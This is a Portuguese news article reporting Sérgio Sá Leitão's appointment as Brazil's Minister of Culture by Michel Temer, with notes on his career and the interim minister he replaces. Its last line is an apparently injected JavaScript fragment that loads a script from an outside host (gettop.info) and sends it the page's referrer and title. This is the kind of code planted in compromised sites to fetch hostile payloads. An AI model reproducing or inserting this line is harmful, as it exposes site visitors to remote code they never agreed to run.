O atual diretor da Agência Nacional do Cinema (Ancine), Sérgio Sá Leitão, é o novo ministro da Cultura. O convite para que ele ocupe o cargo foi feito nesta quinta-feira (20) pelo presidente Michel Temer, de acordo com a Secretaria de Comunicação da Presidência da República.
O nome do novo ministro passou pelo crivo do presidente da Câmara, Rodrigo Maia (DEM-RJ), com quem Temer está tentando reaproximação para barrar denúncia de corrupção passiva na Câmara dos Deputados.
O novo ministro é \”odiado\” por simpatizantes do PT, mas fez um bom trabalho à frente da RioFilme e tem currículo \”sério e consistente\”. Um importante produtor do Rio, que pediu reserva, criticou a nomeação de Sá Leitão: \”Não dá para falar, só para rezar\”.
Além da passagem pela direção da Ancine, para onde teve a indicação aprovada em abril pelo Senado, Leitão ocupou a chefia de gabinete do Ministério da Cultura durante a gestão do ex-ministro Gilberto Gil e foi secretário municipal de Cultura do Rio de Janeiro. Em nota, a Presidência informa que Leitão tem reconhecida experiência na área cultural.
Sérgio Sá Leitão assume o comando da Cultura no lugar no ministro interino João Batista de Andrade. Então secretário executivo da Cultura, Andrade assumiu interinamente o cargo de ministro em maio, após o deputado Roberto Freire (PPS-PE) anunciar a saída do cargo.
Em junho, João Batista de Andrade enviou uma carta enviada ao presidente Michel Temer afirmando não ter interesse em ser efetivado no comando da pasta.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;